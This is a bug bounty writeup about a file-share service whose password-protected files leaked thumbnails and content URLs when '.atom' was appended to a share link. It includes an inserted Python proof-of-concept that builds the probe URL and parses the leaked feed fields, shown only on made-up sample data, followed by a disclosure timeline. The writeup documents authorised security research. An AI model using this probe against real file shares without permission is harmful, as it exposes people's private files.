How I Was Able to See All of Someone’s Private Files with a Single File-Share Link Through an Atom Feed & Never Give Up #togetherwehitharder HackerOne
So I just went through Google and, using some dorks, found some programs, but I didn’t want to test them. Then I went to Twitter and searched for #bugbounty and #bounty and got a few programs from there; one guy posted that he got some 💵$$$ for reporting a security issue.
So without wasting time I went hunting on that site, but before I got started I crawled the whole website to see its functionality (how it works), and saw that the website had many clients, most of which were HackerOne programs, but two programs were unfamiliar to me. So I decided to go to their website to hunt, found some vulnerabilities, and contacted them by mail.
The next day I got a reply from them:
“Thanks for reporting the issue; can you please submit the vulnerabilities through HackerOne, as we are running a private program there.”
I immediately replied:
“Yes, I have a profile on HackerOne, and here are my details for the invitation.”
After getting the invite I saw the thanks page, which listed HackerOne Top #100 researchers, so I thought there was little chance of finding more vulnerabilities. And after spending some hours I had not found any more issues,
then I was thinking of giving up and moving on, but HackerOne’s #togetherwehitharder reminded me to hit harder 😉
So I started hunting again, and this time I used the website simply as one of its users would; after some hours I went back to hunting.
I got one IDOR (me: woot woot, happiness 😅 overloaded, going crazy 😍).
The next day the report was marked as “Informative”. Then I felt hopeless 😫
Then I said, let’s look at the PoC image (request/response) 😉
In the response I got some juicy info: image URLs with the extension .atom 🤔
I quickly opened those URLs, but all were Page Not Found.
Then I googled “what is atom for files”.
I got a link: https://fileinfo.com/extension/atom
On that page I found an answer that helped me a little bit: “XML-based Atom”.
I googled “XML-based Atom” again and got https://validator.w3.org/feed/docs/atom.html
After reading the whole page I got to know what an Atom feed is.
What is Atom?
Atom is the name of an XML-based Web content and metadata syndication format, and an application-level protocol for publishing and editing Web resources belonging to periodically updated websites.
All Atom feeds must be well-formed XML documents, and are identified with the application/atom+xml media type.
Then it suddenly occurred to me: let me open the file with the .atom extension.
Example: https://example.com/folder/image_token.atom
After opening the URL I was like
“wow, woot woot” 😂 😘
Information disclosed: content, media:content, media:thumbnail
You can get a lot of information, such as file thumbnails, so the files can be accessed without the password. Normally the metadata of a password-protected file cannot be seen (it is hidden by default), but by adding the .atom extension to the image URL you can see all the juicy information.
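Putting the Atom description above and the finding together, here is an added example (my own code, not the program’s and not the author’s tooling) that builds the .atom probe URL from a share link and parses the feed that comes back, pulling out the content, media:content and media:thumbnail fields named above. The feed it runs on is constructed for the example: the host, token and file names in it are made up, and media:content / media:thumbnail are assumed to be in the Media RSS namespace, which is where those element names come from.

```python
"""Added example: probe a file-share link for a leaking Atom feed.

Hypothetical helper, not the vendor's or the author's code. It (1) builds the
".atom" probe URL the writeup describes and (2) parses the feed that comes
back, listing the fields the writeup names as disclosed: content,
media:content and media:thumbnail. SAMPLE_FEED is constructed for the
example; every host, token and file name in it is made up.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit, urlunsplit

ATOM_NS = "http://www.w3.org/2005/Atom"      # Atom namespace from the W3C spec
MEDIA_NS = "http://search.yahoo.com/mrss/"   # Media RSS: media:content / media:thumbnail (assumed)


def atom_probe_url(share_url: str) -> str:
    """Append '.atom' to the path of a share link, keeping any query string.

    https://example.com/folder/image_token?dl=0 -> https://example.com/folder/image_token.atom?dl=0
    """
    parts = urlsplit(share_url)
    path = parts.path.rstrip("/")
    if path.endswith(".atom"):
        return share_url
    return urlunsplit(parts._replace(path=path + ".atom"))


def _tag(ns: str, name: str) -> str:
    """ElementTree's '{namespace}local' tag form."""
    return "{%s}%s" % (ns, name)


def extract_disclosures(feed_xml: str) -> list:
    """Return, per <entry>, the URLs the feed exposes for the shared file.

    Raises ValueError if the document is not an Atom feed. A DOCTYPE is
    refused up front: the feed is untrusted input, and expat-based parsers
    can be made to blow up on entity expansion.
    """
    if "<!DOCTYPE" in feed_xml.upper():
        raise ValueError("refusing feed with a DOCTYPE")
    root = ET.fromstring(feed_xml)
    if root.tag != _tag(ATOM_NS, "feed"):
        raise ValueError("not an Atom feed: root is %s" % root.tag)

    findings = []
    for entry in root.iter(_tag(ATOM_NS, "entry")):
        content = entry.find(_tag(ATOM_NS, "content"))
        # media:content / media:thumbnail may sit directly under <entry> or be
        # wrapped in a <media:group>, so search the entry's whole subtree.
        findings.append({
            "title": entry.findtext(_tag(ATOM_NS, "title"), default=""),
            "content_src": content.get("src") if content is not None else None,
            "media_content": [m.get("url") for m in entry.iter(_tag(MEDIA_NS, "content")) if m.get("url")],
            "thumbnails": [t.get("url") for t in entry.iter(_tag(MEDIA_NS, "thumbnail")) if t.get("url")],
        })
    return findings


def feed_leaks(feed_xml: str) -> bool:
    """True when the feed hands out any file or thumbnail URL.

    For a password-protected share the expected behaviour is an HTTP error or
    an empty feed, so any URL that comes back is the finding.
    """
    return any(f["content_src"] or f["media_content"] or f["thumbnails"]
               for f in extract_disclosures(feed_xml))


# Constructed sample: what a leaking share might return for folder/image_token.atom
SAMPLE_FEED = """
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
  <title>Shared folder</title>
  <id>urn:example:share:abc123</id>
  <updated>2017-09-06T00:00:00Z</updated>
  <entry>
    <title>passport-scan.jpg</title>
    <id>urn:example:file:1</id>
    <updated>2017-09-06T00:00:00Z</updated>
    <content type="image/jpeg" src="https://example.com/folder/passport-scan.jpg?token=abc123"/>
    <media:content url="https://example.com/folder/passport-scan.jpg?token=abc123" type="image/jpeg"/>
    <media:thumbnail url="https://example.com/folder/thumbs/passport-scan_200.jpg?token=abc123" width="200" height="150"/>
  </entry>
  <entry>
    <title>contract.pdf</title>
    <id>urn:example:file:2</id>
    <updated>2017-09-06T00:00:00Z</updated>
    <media:group>
      <media:content url="https://example.com/folder/contract.pdf?token=abc123" type="application/pdf"/>
      <media:thumbnail url="https://example.com/folder/thumbs/contract_200.png?token=abc123"/>
    </media:group>
  </entry>
</feed>
"""

# Constructed sample: the fixed behaviour, a feed that lists nothing for a protected share
EMPTY_FEED = """
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>Shared folder</title>
  <id>urn:example:share:abc123</id>
  <updated>2017-09-06T00:00:00Z</updated>
</feed>
"""

if __name__ == "__main__":
    print(atom_probe_url("https://example.com/folder/image_token"))
    for finding in extract_disclosures(SAMPLE_FEED):
        print(finding)
    print("leaks:", feed_leaks(SAMPLE_FEED), "| fixed:", feed_leaks(EMPTY_FEED))
```

Against a live target you would fetch atom_probe_url(share_url) once without the share password and hand the body to feed_leaks(); a thumbnail or content URL coming back for a password-protected share is the bug the writeup describes. The standard-library parser is acceptable here only because the DOCTYPE check rejects the entity-expansion payloads an untrusted feed could carry.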
I immediately reported the vulnerability to the program.
The next day I got a reply with a reward (bounty on triage).
6th September 2017: Reported
7th September 2017: Got a response from the team
7th September 2017: Triaged
7th September 2017: Rewarded bounty (cool bounty)
13th September: Resolved
13th September: But they had not fixed it, so I replied
13th September: Team replied
14th September: Team replied again and gave me some “more information” regarding the patch
14th September: Fixed
10th October: Requested permission for a blog post
12th October: Content for the blog post provided to the team
13th October: Permission granted for the blog post
I would like to thank HackerOne, an awesome platform for (white hat) hackers,
for https://medium.com/@arbazhussain/10-rules-of-bug-bounty-65082473ab8c, which reminds me: don’t give up easily, and give a program time over many days.